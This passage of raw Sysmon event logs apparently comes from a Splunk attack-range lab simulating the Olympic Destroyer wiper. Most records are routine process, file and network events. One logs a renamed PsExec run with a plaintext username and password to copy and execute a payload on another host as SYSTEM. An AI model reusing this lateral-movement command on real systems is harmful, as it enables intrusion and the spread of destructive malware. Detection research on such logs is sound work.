162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000294503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.529{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000294502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.527{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1454-6216-9406-000000003802}5812C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:42.401{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65527-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000294500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:42.401{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65527-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000218729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:42.100{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54346-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218759Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=875F8CF8D3A81EDEFF46557DC5CBBD5A,SHA256=78BFE45C8593E0ADD0C78E5419A8AB4193CF7B2F4F6AA335C4FF00822D3E21A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.863{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FDED8AC803F38F16B48D81BB3C22D00D,SHA256=091D68C284658DD65D554F0D1F2354525300970608BF124EF44236B038DBB98D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294525Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3927F3B6073123C43192F56C7D1A6890,SHA256=065A34FA4807BB4F543720E7602D3A15319ECE50B57CD1E20A9D6B00F236FB8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294524Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.558{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=4EC85101A9B17B5F172EADF3480C50CA,SHA256=B1CF637AB5C5BD4A76C7585FFF83D7630F8D6B397174C9282BF244F67D13D129,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294523Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.342{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294522Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.342{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=DDF0C2622258DF5AE8CB415CDCD08019,SHA256=8D6A5261E229A9B08573C28F549FA17C3A3F874B54F56CF5CC5C177B05CC6774,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294521Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.311{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F118-6215-0100-000000003802}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+97022|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+2d0d6|C:\Windows\system32\lsasrv.dll+32919|C:\Windows\system32\lsasrv.dll+30267|C:\Windows\system32\lsasrv.dll+2f1f1|C:\Windows\system32\lsasrv.dll+1752d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000294520Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.242{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294519Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:45.208{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1455-6216-AE04-000000003902}1788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218754Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218753Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218752Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218751Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218750Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218749Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218748Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218747Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1455-6216-AE04-000000003902}1788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218746Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.192{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1455-6216-AE04-000000003902}1788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218745Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:45.193{4F8D34B0-1455-6216-AE04-000000003902}1788C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294534Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:46.857{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=119441EF3D17B0AE9FFFDDDAE535A858,SHA256=7BD84048CDA467C91E7700F9F0893E892BCDE6949F379727700AD4B5D140E62B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218760Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:46.285{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294533Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.790{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local65531-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000294532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.790{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local65531-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000294531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.719{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65530-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294530Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.719{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65530-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294529Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.688{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local65529-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000294528Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:44.688{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT 